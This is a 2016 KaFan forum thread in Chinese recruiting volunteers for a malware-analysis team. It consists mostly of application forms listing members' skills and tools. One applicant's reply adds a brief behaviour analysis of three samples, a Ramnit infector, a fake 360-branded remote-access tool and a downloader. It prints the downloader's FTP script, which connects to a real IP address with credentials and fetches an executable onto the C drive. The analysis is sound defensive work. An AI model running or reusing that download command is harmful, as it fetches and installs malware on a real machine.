楼主: 翼风Fly
收起左侧

[成员招募] ★★★ 缉毒卫队 ★★★ 成员招募专贴 【禁水&非申请勿回复】

  [复制链接]
1670338677
发表于 2016-1-27 18:04:28 | 显示全部楼层
ID:1670338677
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:熟悉
对行为/逆向的了解程度:完全不了解
了解的安全辅助工具:虚拟机  / PC Hunter / 金山火眼 /PowerTool
建议:无
对自己的描述:想学习逆向等技术
经常活跃的版区:样本区 / 下载区
擅长/爱好:学过一点C
其它:无
代陌
发表于 2016-2-2 20:47:19 | 显示全部楼层
ID:代陌
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:有一点了解
对行为/逆向的了解程度:了解行为分析 / 了解逆向
了解的安全辅助工具: 虚拟机  / PC Hunter / 金山火眼 等
建议:暂无
对自己的描述:正义~~哈哈哈
经常活跃的版区:看到喜欢的帖子就会点进去~~
擅长/爱好:没发现

评分

参与人数 1人气 +2 收起 理由
翼风Fly + 2 欢迎回来!

查看全部评分

翼风Fly
 楼主| 发表于 2016-2-4 18:33:45 | 显示全部楼层
rsin 发表于 2016-2-2 22:44
看到了,太麻烦  算了

因您取消申请,故此次不予通过,感谢您的参与
Kyo.BA
发表于 2016-2-23 12:17:47 | 显示全部楼层
ID:467100524
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识: 有一点了解
对行为/逆向的了解程度:了解行为分析
了解的安全辅助工具: 虚拟机 /shadow defender /sandboxie
建议:建议设立缉毒卫队的群,能更好分析暂时无法处理的问题
对自己的描述:没事儿了,就开始折腾杀软,样本。
经常活跃的版区:国外区/卡巴区/样本区
擅长/爱好:Windwos/Mac/日语
其它:电脑技术方面不能够说是专长,毕竟一些涉及到系统底层的只是还是不太了解,但是希望加入缉毒卫队后能让自己的一些知识为卡饭贡献一份微薄之力。
AFHY
发表于 2016-2-27 15:23:30 | 显示全部楼层
ID:AFHY
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:有一点了解
对行为/逆向的了解程度:完全不了解
了解的安全辅助工具:金山火眼
建议:互相帮助,互相学习
对自己的描述:兴趣浓厚的业余小白
经常活跃的版区:国外杀软软件 / 答疑区
擅长/爱好:爱折腾,强迫症的电脑爱好狂魔

评分

参与人数 1人气 +1 收起 理由
翼风Fly + 1 抱歉,因您长时间未能回复,不予通过。感谢.

查看全部评分

翼风Fly
 楼主| 发表于 2016-3-8 01:02:27 | 显示全部楼层
本帖最后由 翼风Fly 于 2016-3-25 00:35 编辑
AFHY 发表于 2016-2-27 15:23
ID:AFHY
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:有一点了解


您好,希望您能尽快回复一下短消息,3月14日前若仍未回复将视为自动放弃喏~
----------------------------------------
更新:因长时间未进行有效回复,故不予通过。
C-FBI-QM
发表于 2016-3-8 12:04:36 | 显示全部楼层
本帖最后由 C-FBI-QM 于 2016-12-24 16:02 编辑

ID:C-FBI-QM
是否有分析病毒的热情:必须有
是否熟悉 进程 / 注册表 等知识:熟悉
对行为/逆向的了解程度:熟悉行为分析 / 了解逆向
了解的安全辅助工具:虚拟机  / PC Hunter / 金山火眼 等
对自己的描述:新人一枚
经常浏览的版区:样本区
擅长/爱好:作死
其他:要不要考虑另外一个扫描网站,virusbook,火眼和B超已经不维护了
附行为分析一枚,样本来自52一个求助帖:
http://www.52pojie.cn/thread-472685-1-1.html
一共三个文件
第一个qxxxx:
PEID查壳,UPX,看区段,UPX0 UPX1 RMNET RSRC
典型的ramnit感染性,放到virusbook扫了下
确定无疑,这个就不行为了。
qxxxxPEID.png
qxxxx virusbook.png
第二个server:
详细信息写的居然是360安全卫士 安全防护中心模块
但是没有数字签名,一看就是假的吗
server r.png
查壳,无壳VC6,但是入口对不上,不管咯,下面跑起来
serverPEID.png
连接一个IP,修改了注册表,来实现自启动
很明显的远控特征
server reg.png
server connect.png
第三个zykis:
PEID查壳,不是有效PE文件
zykisPEID.png
用hexworkshop编辑一下,应该是个下载器
zykis hex.png
再用notepad++试试
open 175.102.32.77
123
123
get kis.exe c:\stkis.exe
bye
太明显了,但是这个exe我没有获取到
大体就酱,如有不对之处,请赐教
2483883670
发表于 2016-3-12 19:32:39 | 显示全部楼层
ID:2483883670
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:熟悉
对行为/逆向的了解程度:了解行为分析
了解的安全辅助工具:powertool/PC Hunter/ 金山火眼
建议:互相帮助,和平共处
对自己的描述:会冷静思考问题
经常活跃的版区:样本区
擅长/爱好:本人热爱计算机病毒研究,擅长使用ARK工具手杀病毒
其它:无
xin053
发表于 2016-3-16 19:07:30 | 显示全部楼层
ID:xin053
是否有分析病毒的热情:有
是否熟悉 进程 / 注册表 等知识:熟悉
对行为/逆向的了解程度: 熟悉逆向
了解的安全辅助工具:虚拟机  / PC Hunter / OD / IDA / wireshark
建议:好好学习,逆向分析
对自己的描述:学习逆向知识的小白,对网络安全略有研究
经常活跃的版区:样本区
擅长/爱好:wireshark网络分析,OD,IDA破解简单CM与逆向分析,win32汇编
其它: 了解大多数编程语言,目前正在学逆向的同时苦练python,并开始入门学习kali,无奈很多东西还只停留在理论上,动手太少,原谅我目前没有什么拿得出手的作品,希望加入团队共同进步,谢谢
windows7爱好者
发表于 2016-3-17 22:14:50 | 显示全部楼层
版主啊,这是我第二次申请了,关于魅力的问题,你就饶了我吧
ID:windows7爱好者
是否有分析病毒的热情:十分有
是否熟悉 进程 / 注册表 等知识:熟悉
对行为/逆向的了解程度:熟悉行为分析,逆向就不会了
了解的安全辅助工具:PT,PC,火眼,哈勃,VT,VB,影子,虚拟机
建议:卡饭的气氛应该更积极活跃一些,不能因为害怕惹人就不敢正视问题,指明问题
对自己的描述:IT技术爱好者
经常活跃的版区:样本区 / 病毒救援区 / 答疑区 / 国外杀毒软件区/HIPS区/辅助工具区/windows系统区/国内杀毒软件区
擅长/爱好:IT技术
其它:希望这次可以通过

评分

参与人数 1人气 +1 收起 理由
翼风Fly + 1 欢迎加入!

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 00:45 , Processed in 0.121587 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表